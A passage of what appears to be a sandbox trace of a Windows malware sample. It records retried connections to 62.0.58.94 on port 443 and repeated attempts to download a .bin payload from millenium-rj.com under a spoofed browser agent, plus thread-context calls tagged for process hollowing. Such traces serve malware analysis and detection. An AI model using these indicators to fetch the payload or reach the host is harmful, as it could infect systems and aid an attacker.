23:35:17,612", "thread_id": "11160", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1260 }, { "timestamp": "2025-02-27 23:35:17,612", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004c8", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1224" } ], "repeated": 0, "id": 1261 }, { "timestamp": "2025-02-27 23:35:17,612", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c8" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1262 }, { "timestamp": "2025-02-27 23:35:17,612", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c8" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x80\\xd8s\\x00" } ], "repeated": 0, "id": 1263 }, { "timestamp": "2025-02-27 23:35:17,612", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1224" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1264 }, { "timestamp": "2025-02-27 23:35:17,612", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c8" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xcaI\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1265 }, { "timestamp": "2025-02-27 23:35:17,612", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1224" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1266 }, { "timestamp": "2025-02-27 23:35:17,612", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c8" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1267 }, { "timestamp": "2025-02-27 23:35:17,612", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c8" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1268 }, { "timestamp": "2025-02-27 23:35:17,612", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1224" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1269 }, { "timestamp": "2025-02-27 23:35:17,612", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1224" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1270 }, { "timestamp": "2025-02-27 23:35:18,191", "thread_id": "6172", "caller": "0x771bbcf6", "parentcaller": "0x7718616c", "category": "threading", "api": "NtQueryInformationThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "12" }, { "name": "ThreadInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "ThreadId", "value": "6172" } ], "repeated": 0, "id": 1271 }, { "timestamp": "2025-02-27 23:35:18,191", "thread_id": "6172", "caller": "0x771bbd19", "parentcaller": "0x7718616c", "category": "threading", "api": "NtTerminateThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x00000000" }, { "name": "ExitStatus", "value": "0x00000000" }, { "name": "ThreadId", "value": "0" }, { "name": "ProcessId", "value": "0" } ], "repeated": 0, "id": 1272 }, { "timestamp": "2025-02-27 23:35:18,191", "thread_id": "6836", "caller": "0x771bbcf6", "parentcaller": "0x7718616c", "category": "threading", "api": "NtQueryInformationThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "12" }, { "name": "ThreadInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "ThreadId", "value": "6836" } ], "repeated": 0, "id": 1273 }, { "timestamp": "2025-02-27 23:35:18,191", "thread_id": "6836", "caller": "0x771bbd19", "parentcaller": "0x7718616c", "category": "threading", "api": "NtTerminateThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x00000000" }, { "name": "ExitStatus", "value": "0x00000000" }, { "name": "ThreadId", "value": "0" }, { "name": "ProcessId", "value": "0" } ], "repeated": 0, "id": 1274 }, { "timestamp": "2025-02-27 23:35:19,816", "thread_id": "11160", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1275 }, { "timestamp": "2025-02-27 23:35:19,816", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1224" } ], "repeated": 0, "id": 1276 }, { "timestamp": "2025-02-27 23:35:19,816", "thread_id": "11160", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 5, "id": 1277 }, { "timestamp": "2025-02-27 23:35:19,816", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0038" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1278 }, { "timestamp": "2025-02-27 23:35:19,816", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1279 }, { "timestamp": "2025-02-27 23:35:19,816", "thread_id": "11160", "caller": "0x72dabc04", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1280 }, { "timestamp": "2025-02-27 23:35:20,894", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc003c", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1281 }, { "timestamp": "2025-02-27 23:35:20,894", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1282 }, { "timestamp": "2025-02-27 23:35:20,894", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc003c" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1283 }, { "timestamp": "2025-02-27 23:35:20,894", "thread_id": "11160", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1284 }, { "timestamp": "2025-02-27 23:35:20,894", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004bc", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1212" } ], "repeated": 0, "id": 1285 }, { "timestamp": "2025-02-27 23:35:20,894", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004bc" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1286 }, { "timestamp": "2025-02-27 23:35:20,894", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004bc" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x80\\xd8s\\x00" } ], "repeated": 0, "id": 1287 }, { "timestamp": "2025-02-27 23:35:20,894", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1212" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1288 }, { "timestamp": "2025-02-27 23:35:20,894", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004bc" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xcaO\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1289 }, { "timestamp": "2025-02-27 23:35:20,894", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1212" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1290 }, { "timestamp": "2025-02-27 23:35:20,894", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004bc" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1291 }, { "timestamp": "2025-02-27 23:35:20,894", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004bc" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1292 }, { "timestamp": "2025-02-27 23:35:20,894", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1212" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1293 }, { "timestamp": "2025-02-27 23:35:20,894", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1212" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1294 }, { "timestamp": "2025-02-27 23:35:21,894", "thread_id": "388", "caller": "0x76f66f18", "parentcaller": "0x76f66dcd", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000488" } ], "repeated": 0, "id": 1295 }, { "timestamp": "2025-02-27 23:35:21,894", "thread_id": "388", "caller": "0x76f66f18", "parentcaller": "0x76f66dcd", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 1296 }, { "timestamp": "2025-02-27 23:35:23,316", "thread_id": "11160", "caller": "0x72dbaed3", "parentcaller": "0x76512043", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 3, "id": 1297 }, { "timestamp": "2025-02-27 23:35:23,316", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72d8ee02", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1212" } ], "repeated": 0, "id": 1298 }, { "timestamp": "2025-02-27 23:35:23,316", "thread_id": "11160", "caller": "0x72e2c03a", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 7, "id": 1299 }, { "timestamp": "2025-02-27 23:35:23,316", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc003c" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1300 }, { "timestamp": "2025-02-27 23:35:23,316", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1301 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1302 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0040", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1303 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1304 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0040" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1305 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "11036", "caller": "0x764e2689", "parentcaller": "0x73cbcb7a", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000488" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 1306 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000049c" } ], "repeated": 0, "id": 1307 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004b4" } ], "repeated": 0, "id": 1308 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 2, "id": 1309 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73d0512a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 1310 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73cc2629", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004c4" } ], "repeated": 0, "id": 1311 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73d0517f", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000488" } ], "repeated": 0, "id": 1312 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77186a76", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004c0" } ], "repeated": 0, "id": 1313 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "11036", "caller": "0x72dd2ae3", "parentcaller": "0x72dcc4b5", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 25, "id": 1314 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004c0", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1216" } ], "repeated": 0, "id": 1315 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c0" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1316 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c0" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\x88\\xact\\x00" } ], "repeated": 0, "id": 1317 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1216" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1318 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c0" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xcaR\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1319 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1216" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1320 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c0" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1321 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004c0" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1322 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1216" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1323 }, { "timestamp": "2025-02-27 23:35:24,331", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1216" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1324 }, { "timestamp": "2025-02-27 23:35:28,347", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72ec3a14", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1216" } ], "repeated": 0, "id": 1325 }, { "timestamp": "2025-02-27 23:35:28,347", "thread_id": "11036", "caller": "0x72e59ac9", "parentcaller": "0x72ddc292", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 8, "id": 1326 }, { "timestamp": "2025-02-27 23:35:28,347", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0040" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1327 }, { "timestamp": "2025-02-27 23:35:28,347", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1328 }, { "timestamp": "2025-02-27 23:35:29,362", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1329 }, { "timestamp": "2025-02-27 23:35:29,362", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0044", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1330 }, { "timestamp": "2025-02-27 23:35:29,362", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1331 }, { "timestamp": "2025-02-27 23:35:29,362", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0044" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1332 }, { "timestamp": "2025-02-27 23:35:29,362", "thread_id": "11036", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1333 }, { "timestamp": "2025-02-27 23:35:29,362", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": 